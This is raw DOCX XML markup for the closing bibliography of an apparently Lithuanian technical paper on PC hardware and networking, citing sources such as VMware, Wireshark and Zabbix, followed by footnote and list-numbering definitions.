          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>VMware.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId398">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://www.vmware.com/products/workstation-player/workstation-player-evaluation.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="41DC6569" w14:textId="77777777" w:rsidR="000406E9" w:rsidRPr="005A5C28" w:rsidRDefault="000406E9" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">What Is Network Topology? Best Guide to Types and Diagrams. (2019, rugpjūčio 15). </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">DNSstaff. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId399">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://www.dnsstuff.com/what-is-network-topology</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3F2B50E0"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What is the difference between SDRAM, DDR1, DDR2, DDR3 and DDR4? </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Transcend. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId400" w:anchor=":~:text=DDR2%20memory%20is%20at%20the,improved%20I%2FO%20bus%20signal.&amp;text=DDR4%20SDRAM%20provides%20the%20lower,2133~3200%20MT%2Fs">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.transcend-info.com/Support/FAQ-296#:~:text=DDR2%20memory%20is%20at%20the,improved%20I%2FO%20bus%20signal.&amp;text=DDR4%20SDRAM%20provides%20the%20lower,2133~3200%20MT%2Fs</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCA7225"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What’s the Difference Between DDR2, DDR3, and DDR4 RAM? (2019, spalio 8). </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Gadgetsexplorer.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId401">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://gadgetsexplorer.com/2019/10/08/whats-the-difference-between-ddr2-ddr3-and-ddr4-ram/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2089EE4E"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Why lose a router settings after a power outage? (2012 rugsėjo 19). </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Cisco Community.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prieiga per internetą: https://community.cisco.com/t5/routing/why-lose-a-router-settings-after-a-power-outage/td-p/2018457</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6687D95C"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Why won't my computer turn on? (3030, birželio 30). </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Computer Hope.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prieiga per internetą: https://www.computerhope.com/issues/ch000312.htm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AA9304"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Why Won't My Computer Turn On? </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Intel. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId402">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.intel.com/content/www/us/en/gaming/resources/why-wont-my-computer-turn-on.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1ED6A5D8"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Whitson, G. (2020, rugpjūčio 24). What to Do When Your Computer Won't Start. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">PC Magazine. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId403">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.pcmag.com/how-to/what-to-do-when-your-computer-wont-start</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2BA51B73"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WiFi Analyzer downldoad. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId404">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.microsoft.com/en-us/p/wifi-analyzer/9nblggh33n0n?activetab=pivot:overviewtab</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="781AC54B"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Wifi Analyzer download. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Google Play. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId405">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://play.google.com/store/apps/details?id=com.farproc.wifi.analyzer&amp;hl=en_US&amp;gl=US</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="360FC921"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Wi-Fi Heatmaps. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Ekahau. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId406">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.ekahau.com/solutions/wi-fi-heatmaps/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="16A3CCA2"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rPr>
        <w:t xml:space="preserve">Windows Server products &amp; resources. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId407">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.microsoft.com/en-us/evalcenter/evaluate-windows-server-2019</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="24EE2DEF" w14:textId="77777777" w:rsidR="000406E9" w:rsidRPr="005A5C28" w:rsidRDefault="000406E9" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Wireshark. Network protocol analyzer.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId408">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.wireshark.org</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6064DD73" w14:textId="77777777" w:rsidR="000406E9" w:rsidRPr="005A5C28" w:rsidRDefault="000406E9" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Zabbix Documentation 5.0. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Zabbix. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId409" w:history="1">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.zabbix.com/documentation/5.0/manual/installation/install_from_packages/rhel_centos</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6A8FD517" w14:textId="77777777" w:rsidR="000406E9" w:rsidRPr="005A5C28" w:rsidRDefault="000406E9" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="759D4B7D" w14:textId="6376711A" w:rsidR="00B0488D" w:rsidRPr="005A5C28" w:rsidRDefault="00B0488D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:sectPr w:rsidR="00B0488D" w:rsidRPr="005A5C28" w:rsidSect="0089230F">
      <w:footerReference w:type="default" r:id="rId410"/>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8230" w14:textId="77777777" w:rsidR="008F04A2" w:rsidRDefault="008F04A2" w:rsidP="00327C69">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="529B5BD4" w14:textId="77777777" w:rsidR="008F04A2" w:rsidRDefault="008F04A2"/>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0FA6DDB6" w14:textId="77777777" w:rsidR="008F04A2" w:rsidRDefault="008F04A2" w:rsidP="00327C69">
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F945B06" w14:textId="77777777" w:rsidR="008F04A2" w:rsidRDefault="008F04A2"/>
  </w:endnote>
  <w:endnote w:type="continuationNotice" w:id="1">
    <w:p w14:paraId="1B79E694" w14:textId="77777777" w:rsidR="008F04A2" w:rsidRDefault="008F04A2"/>
    <w:p w14:paraId="2E8F6AAC" w14:textId="77777777" w:rsidR="008F04A2" w:rsidRDefault="008F0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53995D46" w:rsidR="003B40A9" w:rsidRPr="00B35968" w:rsidRDefault="003B40A9" w:rsidP="00A554DA">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:instrText>PAGE   \* MERGEFORMAT</w:instrText>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidRPr="002867D4">
      <w:rPr>
        <w:noProof/>
        <w:lang w:val="lt-LT"/>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18D66" w14:textId="77777777" w:rsidR="008F04A2" w:rsidRDefault="008F04A2" w:rsidP="00327C69">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="237A875B" w14:textId="77777777" w:rsidR="008F04A2" w:rsidRDefault="008F04A2"/>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="67248D21" w14:textId="77777777" w:rsidR="008F04A2" w:rsidRDefault="008F04A2" w:rsidP="00327C69">
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="00470E92" w14:textId="77777777" w:rsidR="008F04A2" w:rsidRDefault="008F04A2"/>
  </w:footnote>
  <w:footnote w:type="continuationNotice" w:id="1">
    <w:p w14:paraId="3A15A11E" w14:textId="77777777" w:rsidR="008F04A2" w:rsidRDefault="008F04A2"/>
    <w:p w14:paraId="6AD2BC7C" w14:textId="77777777" w:rsidR="008F04A2" w:rsidRDefault="008F04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088"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E5B03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7E2079"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E786A452"/>
    <w:lvl w:ilvl="0" w:tplc="89249922">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29F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8454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DE491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E44DC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0EB44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78194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22DBF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9652F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CE1A06"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="38B4DDBC">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperLetter"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="17F4291C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="8B085056">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="5B0C6242">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="0B6216FA">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="C67AC97A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="FB046586">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="52DE6DDA">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="C86C5B82">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="03766AC1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DA964D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C65F3B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2C7E2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3475CE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="39863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4E32CAF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="F1ACF072">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="D3FAA3F8">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="001A2B44">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="3CF872B8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="68C834F4">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="C7E4F388">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="301AAAA2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="94C6EEAA">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="9C68CD9E">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0542748B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="479E07C6"/>
    <w:lvl w:ilvl="0" w:tplc="B284FC88">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:b/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="D30CF90A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1080" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="7C08CED0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="1800" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="A1F6D5EC">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2520" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="7DA0F44E">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3240" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="FC8081DC">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="3960" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="53123AB6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4680" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="DC16E6D6">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5400" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="2E2C96BE">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6120" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="05A11751"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E68636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411ADE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A0AA45D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07637F6E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D2661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587D00"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BCA0FB4A"/>
    <w:lvl w:ilvl="0" w:tplc="02944D9A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%1."/>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B68CD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BC868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00FAA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08BAC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3CABB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82FF8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4A311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8430C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B684D6E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8EC0F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B822A27"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="85966D9E">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperLetter"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="AA74AFEA">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="44107D26">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
